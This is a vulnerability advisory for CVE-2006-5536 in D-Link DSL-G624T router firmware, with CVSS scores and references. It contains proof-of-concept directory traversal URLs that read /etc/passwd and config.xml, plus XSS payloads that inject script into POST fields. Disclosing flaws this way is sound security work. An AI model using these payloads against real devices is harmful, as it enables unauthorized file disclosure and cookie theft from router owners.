CVE-2006-5536: D-Link DSL-G624T several vulnerabilities

Directory traversal vulnerability in cgi-bin/webcm in D-Link DSL-G624T firmware 3.00B01T01.YA-C.20060616 allows remote attackers to read arbitrary files via a .. (dot dot) in the getpage parameter.

Researcher

José Ramón Palanco: jpalanco@gmail.com

Details

Vulnerabilities

Directory transversal

Examples:

http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd

http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml

Cross Site Scripting

Affected url: http://router/cgi-bin/webcm

Method	Variable	Value
POST	upnp%3Asettings%2Fstate	>”><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>
POST	upnp%3Asettings%2Fconnection	>”><ScRiPt%20%0a%0d>alert(document.cookie)%3B</ScRiPt>
POST	upnp%3Asettings%2Fconnection	“+onmouseover=”alert(document.cookie)

Directory listing

Affected: /cgi-bin directory

Products and Versions

• Vendor: D-LINK
• Product: DSL-G624T
• Version: V3.00B01T01.YA-C.20060616

CPE v2.3

cpe:2.3:h:d-link:dsl-g624t:firmware_3.00b01t01.ya_c.2006-06-16:::::::*

CVSS Scores & Vulnerability Types

Name	Value
CVSS Score	5.0
Confidentiality Impact	Partial (There is considerable informational disclosure.)
Integrity Impact	None (There is no impact to the integrity of the system)
Availability Impact	None (There is no impact to the availability of the system.)
Access Complexity	Low (Specialized access conditions or extenuating circumstances do not exist. Very little knowledge or skill is required to exploit. )
Authentication	Not required (Authentication is not required to exploit the vulnerability.)
Gained Access	None
Vulnerability Type(s)	Directory traversal
CWE ID	CWE id is not defined for this vulnerability

References

• BID 20689 D-Link DSL-G624T Information Disclosure Vulnerability Release Date:2007-05-03
• VUPEN ADV-2006-4191
• BUGTRAQ 20061023 D-Link DSL-G624T several vulnerabilities
• SREASON 1781